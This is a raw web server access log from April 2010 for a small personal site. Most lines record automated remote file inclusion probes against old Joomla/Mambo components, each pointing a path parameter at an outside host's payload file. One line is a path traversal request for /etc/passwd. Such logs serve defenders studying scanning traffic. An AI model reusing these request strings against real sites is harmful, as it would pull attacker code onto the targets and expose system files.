174.121.17.40 - - [09/Apr/2010:08:41:21 -0500] "GET /index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
217.71.121.170 - - [09/Apr/2010:08:41:28 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:43 -0500] "GET /logs/access_log.1266710400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:46 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:46 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.189.18.93 - - [09/Apr/2010:08:42:46 -0500] "GET /logs/access_log.1266710400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:43:53 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:43:53 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:43:53 -0500] "GET /logs/access_log.1221696000//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.195.112.180 - - [09/Apr/2010:08:44:40 -0500] "GET /logs/access_log.1225929600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.20.146 - - [09/Apr/2010:08:44:41 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:44:41 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:44:41 -0500] "GET /logs/access_log.1221696000//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
202.12.74.253 - - [09/Apr/2010:08:45:01 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.0" 404 328 "-""Mozilla/5.0"
202.12.74.253 - - [09/Apr/2010:08:45:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.0" 404 323 "-""Mozilla/5.0"
202.12.74.253 - - [09/Apr/2010:08:45:01 -0500] "GET /logs/access_log.1266710400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://booking.tesene.it/admin/templates_c/footer.txt?? HTTP/1.0" 404 350 "-""Mozilla/5.0"
74.222.4.219 - - [09/Apr/2010:08:45:49 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/robots.txt""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
74.222.4.219 - - [09/Apr/2010:08:45:52 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
125.24.109.235 - - [09/Apr/2010:08:46:16 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://images.google.co.th/imglanding?q=tattoo%20Ring&imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__DBkcwZ_MX5DiNyQWW6tx1revkD0=&h=194&w=225&sz=13&hl=th&um=1&itbs=1&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&prev=/images%3Fq%3Dtattoo%2BRing%26tbnid%3DMylGYqvA2e8GZM%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dth%26sa%3DX%26ndsp%3D20%26imgtype%3Di_similar%26tbs%3Disch:1&tbnid=MylGYqvA2e8GZM&tbnh=0&tbnw=0&um=1&sa=X&ndsp=20&imgtype=i_similar&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
206.225.20.146 - - [09/Apr/2010:08:47:07 -0500] "GET /logs/access_log.1199577600//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:47:29 -0500] "GET /logs/access_log.1268265600//components/com_simpleboard/file_upload.php?sbp=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.129.119.43 - - [09/Apr/2010:08:47:59 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET /logs/access_log.1221696000%20%20//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET /logs/access_log.1221696000%20%20//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:50:18 -0500] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.30.161.241 - - [09/Apr/2010:08:52:53 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [09/Apr/2010:08:55:36 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:56:30 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:08:56:36 -0500] "GET /logs/access_log.1221696000//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://hichance.pe.kr/bbs/data2/photo_03/1177916136/security/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:14 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:14 -0500] "GET /logs/access_log.1219363200%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:15 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:48 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:48 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:57:48 -0500] "GET /logs/access_log.1219363200//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:55 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:55 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:55 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:58 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:58 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:08:57:58 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:58:07 -0500] "GET /logs/access_log.1219363200//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:58:07 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:58:07 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.46.204.187 - - [09/Apr/2010:08:59:29 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:02:05 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:05:21 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:05:21 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:05:22 -0500] "GET /logs/access_log.1268265600%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:06:00 -0500] "GET //upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:06:00 -0500] "GET /logs//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:06:00 -0500] "GET /logs/access_log.1225238400//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:06:11 -0500] "GET /logs/access_log.1219536000//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:06:40 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:06:40 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:06:40 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:07:31 -0500] "GET /logs/access_log.1227916800//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:08:10 -0500] "GET //include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:08:10 -0500] "GET /logs/access_log.1217203200%20%20//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:08:10 -0500] "GET /logs//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:08:29 -0500] "GET /logs/access_log.1219449600//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:08:43 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:08:43 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:08:43 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.129.228.250 - - [09/Apr/2010:09:08:48 -0500] "GET /logs/access_log.1221696000//upload/admin/frontpage_right.php?loadadminpage=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.221.130.16 - - [09/Apr/2010:09:09:06 -0500] "GET /logs//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.221.130.16 - - [09/Apr/2010:09:09:06 -0500] "GET /logs/access_log.1217203200%20%20//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.16 - - [09/Apr/2010:09:09:06 -0500] "GET //include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:10:38 -0500] "GET /logs/access_log.1268265600%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:10:38 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:10:38 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
79.174.78.178 - - [09/Apr/2010:09:10:56 -0500] "GET /?tools/send_reminders.php?noSet=0&includedir=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
79.174.78.178 - - [09/Apr/2010:09:10:56 -0500] "GET /logs/access_log.1268611200%20%20/?tools/send_reminders.php?noSet=0&includedir=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
79.174.78.178 - - [09/Apr/2010:09:10:56 -0500] "GET /logs/?tools/send_reminders.php?noSet=0&includedir=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 200 1059 "-""Mozilla/5.0"
134.147.125.103 - - [09/Apr/2010:09:11:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6"
211.174.185.131 - - [09/Apr/2010:09:11:30 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:11:54 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:11:55 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:11:55 -0500] "GET /logs/access_log.1212969600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:16 -0500] "GET /index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:16 -0500] "GET /logs/access_log.1259798400/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:16 -0500] "GET /logs/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:16 -0500] "GET /logs/access_log.1258416000/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:18 -0500] "GET /?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:18 -0500] "GET /logs/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:18 -0500] "GET /index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:18 -0500] "GET /logs/?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 200 1059 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:18 -0500] "GET /logs/access_log.1218067200/?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:18 -0500] "GET /logs/access_log.1259798400/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:12:20 -0500] "GET /logs/access_log.1258416000/index1.php?site=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:27 -0500] "GET /logs/?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 200 1059 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:27 -0500] "GET /?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:09:12:27 -0500] "GET /logs/access_log.1218067200/?mosConfig_absolute_path=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:13:03 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:13:05 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:13:06 -0500] "GET /logs/access_log.1212969600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:14 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:14 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:14 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:15 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:15 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [09/Apr/2010:09:13:15 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.174.185.131 - - [09/Apr/2010:09:13:25 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.52.143.33 - - [09/Apr/2010:09:15:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
121.254.235.62 - - [09/Apr/2010:09:15:22 -0500] "GET /logs/access_log.1268956800%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.254.235.62 - - [09/Apr/2010:09:15:22 -0500] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
